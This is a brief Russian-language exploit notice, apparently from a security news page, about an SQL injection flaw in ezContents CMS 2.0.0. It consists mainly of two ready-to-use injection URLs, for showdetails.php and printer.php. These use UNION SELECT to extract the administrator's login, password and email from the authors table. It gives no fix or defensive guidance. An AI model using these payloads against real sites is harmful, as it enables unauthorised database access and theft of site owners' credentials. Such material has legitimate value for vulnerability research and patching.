Программа: ezContents CMS 2.0.0

Уязвимость позволяет удаленному пользователю выполнить произвольные SQL запросы в базе данных приложения.

Эксплоит:

http://site.com/[patch]/showdetails.php?contentname=’/**/union/**/select/**/1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat (login,0x3a,userpassword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*

http://site.com/[patch]/printer.php?article=’/**/union/**/select/**/1,2,3,4,5,6,7,8, 9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,concat (login,0x3a,userpassword,char(58,58),authoremail),30/**/from/**/authors/**/where/**/authorid=1/*

Оставить мнение